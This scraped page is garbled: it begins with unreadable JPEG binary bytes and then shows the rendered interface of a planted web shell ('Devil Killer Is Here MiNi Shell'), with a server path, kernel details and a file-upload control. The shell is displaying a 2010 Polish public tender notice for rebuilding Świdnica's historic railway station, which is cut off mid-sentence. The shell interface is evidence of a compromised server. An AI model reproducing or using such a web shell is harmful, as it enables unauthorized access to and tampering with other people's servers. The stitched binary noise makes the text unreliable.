JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100819/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100819/256554-N-2010.html

<p class="kh_header"><b>Świdnica: wykonanie robót budowlanych polegających na:

Przebudowie i rewaloryzacji budynku dworca kolejowego w Świdnicy
realizowanych jako część I etapu robót pn:
Przebudowa i rewaloryzacja budynku dworca kolejowego i ul. Dworcowej w Świdnicy
zadania pn:
Budowa Centrum Przesiadkowego przy ul. Dworcowej i Kolejowej w Świdnicy</b><br>
<b>Numer ogłoszenia: 256554 - 2010; data zamieszczenia: 19.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Świdnicy , ul. Armii Krajowej 49, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8562850, faks 074 8523110.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie robót budowlanych polegających na:

Przebudowie i rewaloryzacji budynku dworca kolejowego w Świdnicy
realizowanych jako część I etapu robót pn:
Przebudowa i rewaloryzacja budynku dworca kolejowego i ul. Dworcowej w Świdnicy
zadania pn:
Budowa Centrum Przesiadkowego przy ul. Dworcowej i Kolejowej w Świdnicy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa i rewaloryzacja budynku dworca kolejowego w Świdnicy.
Przeznaczony do przebudowy budynek dworca PKP (wzniesiony w latach 1910 - 1920) wpisany jest do wojewódzkiej ewidencji zabytków i do ewidencji zabytków miasta Świdnica jako zespół kolejowy Świdnica Miasto. 



Inwestor czyni starania o dofinansowanie inwestycji Budowa Centrum Przesiadkowego przy ul. Dworcowej i Kolejowej w Świdnicy; w tym na Przebudowę i rewaloryzację budynku dworca kolejowego w Świdnicy, ze środków pomocowych w ramach RPO dla Województwa Dolnośląskiego na lata 2007-2013 w ramach priorytetu Rozwój infrastruktury transportowej na Dolnym Śląsku (Transport miejski i podmiejski).


2. Zakres przedmiotu zamówienia obejmuje wykonanie części robót objętych decyzją o pozwoleniu na budowę dla Przebudowy i rewaloryzacji budynku dworca kolejowego i ul. Dworcowej w Świdnicy; a w szczególności:

2.1. Wykonanie przebudowy i rewaloryzacji budynku dworca kolejowego, zgodnie ze sztuką budowlaną, ze specyfikacją techniczną wykonania i odbioru robót, z decyzją o pozwoleniu na budowę, z projektem wykonawczym, w zakresie:
2.1.1. roboty ogólnobudowlane kubaturowe polegające na:
- rozbiórce parterowej przybudówki, 
- przebudowie i remoncie ścian w budynku,
- remoncie stropów i sufitów, 
- wykonaniu robót posadzkarskich,
- wykonaniu robót stolarskich,
- wykonaniu robót murowych,
- remoncie dachu
- wymianie, remoncie lub rewaloryzacji wskazanej stolarki,
- rewaloryzacji dekoracyjnych elementów wewnętrznych ściennych i sufitowych,
- remoncie i rewaloryzacji zabytkowej elewacji budynku,
2.1.2. roboty instalacyjne wod-kan-gaz-c.o. dla budynku dworca polegające na:
- wymianie wewnętrznych instalacji wody,
- wykonaniu wewnętrznych instalacji ppoż.,
- wymianie wewnętrznej kanalizacji sanitarnej,
- wykonaniu wewnętrznej instalacji gazu,
- wykonaniu lokalnej kotłowni gazowej w piwnicy budynku,
- wymianie instalacji c.o.,
- wykonaniu wentylacji grawitacyjnej i mechanicznej,
- wykonaniu przyłączy wody i kanalizacji.
2.1.3. roboty instalacji elektrycznych dla budynku dworca polegające na:
- wymianie wewnętrznych instalacji elektrycznych oświetlenia, siły i gniazd wtykowych,
- montażu instalacji oświetlenia awaryjnego i ewakuacyjnego,
- montażu instalacji oświetlenia zewnętrznego i instalacji ppoż.,
- montażu instalacji strukturalnych, systemu telewizji dozorowej i informacji pasażerskiej,
- wykonaniu systemu rozgłoszeniowego i przyzywowego,
- montażu instalacji odgromowych.

2.2. Wykonanie innych robót i prac niezbędnych dla należytego wykonania zamówienia, w tym:
- oznakowanie placu budowy, 
- organizacja zaplecza budowy,
- organizacja dojść i dojazdów do posesji w trakcie prowadzenia robót,
- wywóz gruzu i innych materiałów nieużytecznych na składowisko odpadów (koszty składowania ponosi Wykonawca), uporządkowanie terenu budowy,
- opracowanie planu bezpieczeństwa i ochrony zdrowia BIOZ,
- uzgadnianie z projektantem i Konserwatorem Zabytków szczegółów prac renowacyjnych i konserwatorskich, zgodnie ze wskazaniem w projekcie budowlanym i wykonawczym,
- niezwłoczne zawiadomienie Zamawiającego o wszelkich zagrożeniach lub nowych okolicznościach wynikłych w trakcie prowadzenia robót, w tym prac i robót dotyczących zabytkowych elementów budynku.

2.3. Przedmiotem niniejszego zamówienia nie jest budowa;
- ogrodzenia,
- dróg, placów, chodników,
- sieci wod-kan usytuowanych w drogach i placach,
choć wykonanie tych robót objęte jest decyzją o pozwoleniu na budowę dla Przebudowy i rewaloryzacji budynku dworca kolejowego i ul. Dworcowej w Świdnicy.

Planowane roboty wykonane będą w zabytkowym budynku użyteczności publicznej wpisanym do gminnej i wojewódzkiej ewidencji zabytków, położonym w centrum Świdnicy. Budynek ma zróżnicowaną wysokość (2 lub 3 kondygnacje nadziemne + podpiwniczenie), wykonany jest w technologii tradycyjnej, więźba dachowa drewniana, dach stromy kryty dachówką.
Przebudowa nie zmienia formy architektonicznej budynku ani głównych parametrów (wysokości, szerokości, długości, geometrii dachów). W wyniku przebudowy zmienia się układ funkcjonalny pomieszczeń na poszczególnych kondygnacjach z zachowaniem podstawowej funkcji dworca na parterze.
Rewaloryzacja ma przywrócić pierwotną formę elewacji; dobudowane na elewacji elementy typu zadaszenia wejść winny być architektonicznie spójne z elementami wystroju architektonicznego elewacji. Rewaloryzacji podlega również zabytkowy hall dworca. Roboty na zabytkowych elementach budynku mogą być wykonywane pod nadzorem osób posiadających praktykę na budowie przy zabytkach nieruchomych. Na Wykonawcy spoczywa obowiązek bieżących konsultacji i roboczych uzgodnień z Wojewódzkim Konserwatorem Zabytków, przy udziale przedstawiciela Zamawiającego, w zakresie wskazanym w projekcie budowlanym i wykonawczym.
Zamierzenie budowlane pn. Budowa Centrum Przesiadkowego przy ul. Dworcowej i Kolejowej w Świdnicy podzielone zostało na 3 etapy realizacyjne. Przebudowa budynku dworca kolejowego jest częścią I etapu robót. W przebudowanym budynku dworca kolejowego zlokalizowane będą główne funkcje Centrum Przesiadkowego w Świdnicy.

4. Przedmiot zamówienia szczegółowo został opisany w specyfikacji technicznej wykonania i odbioru robót, w projekcie budowlanym, w projekcie wykonawczym i w przedmiarze robót. Dokumentacja projektowa została opracowana przez Architektoniczną Pracownię Projektową s.c. A. Mikuła, B. Mikuła ze Świdnicy.

Projekt budowlany i wykonawczy, specyfikacja techniczna wykonania i odbioru robót oraz przedmiary robót stanowią załącznik do niniejszej specyfikacji i znajdują się na stronie internetowej Zamawiającego www.swidnica.bip-gov.info.pl w katalogu zamówienia publiczne. Dokumentacja projektowa w wersji papierowej jest do wglądu w siedzibie Zamawiającego - Urząd Miejski w Świdnicy, ul. Armii Krajowej nr 49, Referat Inwestycji - pok. 218..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza udzielenie zamówień uzupełniających, o którym mowa w art. 67 ust. 1 pkt  1)a), pkt 5) i pkt  6) ustawy z dnia 29.01.2004 r. Prawo Zamówień Publicznych (tekst jednolity Dz. U. z 2010r. Nr 113, poz.759</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.33.00.00-0, 45.20.00.00-9, 45.31.10.00-3, 45.31.51.00-9, 45.31.56.00-4, 45.31.21.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca oświadczy, że posiada uprawnienia do wykonywania działalności i czynności objętych przedmiotem zamówienia,
Ocena zostanie dokonana wg formuły spełnia - nie spełnia na podstawie oświadczeń i dokumentów,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże wykonanie robót budowlanych o zakresie zgodnym z przedmiotem zamówienia, tj. przedłoży wykaz
; minimum 2-ch robót polegających na przebudowie budynków użyteczności publicznej o kubaturze nie mniejszej od 10 000 m3 w zakresie robót budowlanych i instalacyjnych 
oraz 
; minimum 1-nej roboty polegającej na rewaloryzacji zabytkowego budynku, w zakresie której było wykonanie prac sztukatorskich, konserwacji kamieniarki architektonicznej, konserwacji zabytkowych elementów stalowych, konserwacji zabytkowej stolarki oraz konserwacji zabytkowych, sklepionych wnętrz budynku (jak istniejący hall dworca) , 
przy czym roboty dotyczące przebudowy i roboty dotyczące rewaloryzacji mogą być wykazane w tych samych budynkach lub w budynkach różnych.
Zamawiający bezwzględnie wymaga, by wykazane wykonanie prac rewaloryzacyjnych dotyczyło robót zgodnych z przedmiotem zamówienia; w szczególności z wykazu musi jasno wynikać wykonanie min. 1-nej realizacji w zakresie której było wykonanie prac sztukatorskich, min. 1-nej realizacji obejmującej konserwację kamieniarki architektonicznej, min. 1-nej roboty obejmującej konserwację zabytkowych elementów stalowych, min. 1-nej z konserwacją zabytkowej stolarki oraz min. 1-nej realizacji obejmującej konserwację sklepionych wnętrz budynku (jak przeznaczony do rewaloryzacji hall dworca). Minimalna kubatura budynku poddanego rewaloryzacji winna wynosić 3 000 m3.
Roboty te winny być wykonane w okresie ostatnich 5 lat przed upływem terminu składania ofert, a w przypadku, gdy okres działalności jest krótszy - w tym okresie, 
- Wykonawca dołączy dokumenty potwierdzające, że w/w roboty wykonane zostały należycie; z treści tych dokumentów musi jasno wynikać potwierdzenie wszystkich danych zawartych w w/w wykazie w tym: nazwę zadania i adres, wartość netto robót, wskazanie zamawiającego, rodzaj robót objętych zadaniem, opis robót wykonanych przez Wykonawcę, którego należyte wykonanie potwierdzają, okres realizacji robót przez Wykonawcę, kubatura budynku, w którym były wykonane,
Ocena zostanie dokonana wg formuły spełnia - nie spełnia na podstawie oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawca przedłoży wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w tym wykaże osoby, które kierować będą przebudową: kierownik budowy, kierownik robót dla branży sanitarnej, kierownik robót dla branży elektrycznej, osoba posiadająca doświadczenie w kierowaniu robotami budowlanymi prowadzonymi przy zabytku nieruchomym z zastrzeżeniem, że:
osoby typowane do nadzorowania robót winny posiadać uprawnienia budowlane bez ograniczeń odpowiednio do charakteru nadzorowanych robót:
, dla robót ogólnobudowlanych kubaturowych i dla nadzorowania robót prowadzonych przy zabytku nieruchomym - uprawnienia budowlane w specjalności konstrukcyjno - budowlanej,
; dla robót instalacyjnych wod-kan-gaz-c.o. - uprawnienia budowlane w specjalności instalacyjno - sanitarnej
; dla robót instalacji elektrycznych - uprawnienia budowlane w specjalności instalacyjno - elektrycznej,
zgodnie z przepisami Prawa budowlanego w tym zakresie.
- osoby typowane do funkcji kierownika budowy i do kierowania robotami budowlanymi prowadzonymi przy zabytku nieruchomym winny posiadać niezbędne doświadczenie:
; kierownik budowy - doświadczenie w kierowaniu minimum 2 budowami dotyczącymi przebudowy budynków użyteczności publicznej o kubaturze min. 10 000 m3,
; osoba do nadzorowania prac konserwatorskich na budynku - winna posiadać co najmniej 2-letnią praktykę na budowie przy zabytku nieruchomym,
Ocena zostanie dokonana wg formuły spełnia - nie spełnia na podstawie oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że:
- posiada środki finansowe lub zdolność kredytową w wysokości min. 1 mln zł ,
- posiada ważne ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej dotyczące przedmiotu zamówienia na sumę ubezpieczenia nie mniejszą jak: 5 mln zł.

Ocena zostanie dokonana wg formuły spełnia - nie spełnia na podstawie oświadczeń i dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a w stosunku do osób fizycznych: 
 oświadczenie Nr 3 (zał. nr 1 do oferty Wykonawcy).
- zestawienie rzeczowo-finansowe - koszty całkowite - załącznik nr 17 do oferty Wykonawcy wg wzoru nr 8,

- ofertowy harmonogram rzeczowo -finansowy - koszty brutto - kwartalnie - załącznik nr 18 do oferty Wykonawcy wg wzoru nr 9,
- zaparafowany projekt umowy - załącznik nr 19 do oferty (wg wzoru nr 10),
- dowód wniesienia wadium - załącznik nr 20 do oferty,
- pełnomocnictwo do działania w imieniu Wykonawcy w przypadku, gdy nie jest to osoba upoważniona do reprezentowania Wykonawcy z mocy prawa - załącznik nr 21 do oferty,
- pełnomocnictwo do reprezentowania Wykonawców oferty wspólnej w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, zgodnie z art. 23 ust. 2 ustawy pzp w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna) - zał. nr 22 do oferty
- kosztorys ofertowy - załącznik nr 24 do oferty, sporządzony zgodnie z dz. XII i XIV SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 95.00</li>
<li>2 - Parametry kosztorysowe do robót dodatkowych - 5.00</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający wymaga od Wykonawcy, aby zawarł z nim umowę w sprawie zamówienia publicznego na takich warunkach jak umowa, której projekt stanowi załącznik nr 11 do SIWZ. 
2. Zamawiający przewiduje zmiany umowy w formie pisemnej w następujących przypadkach:
a/ jeżeli zmiana umowy jest korzystna dla Zamawiającego (korzyść ekonomiczna, techniczna, eksploatacyjna),

b/ jeżeli wystąpiły okoliczności, których przy dołożeniu należytej staranności strony na dzień podpisania umowy przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa, które nastąpiły w czasie realizacji zamówienia,

c/ Wykonawca może przedłużyć termin wykonania przedmiotu umowy o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w przypadku:
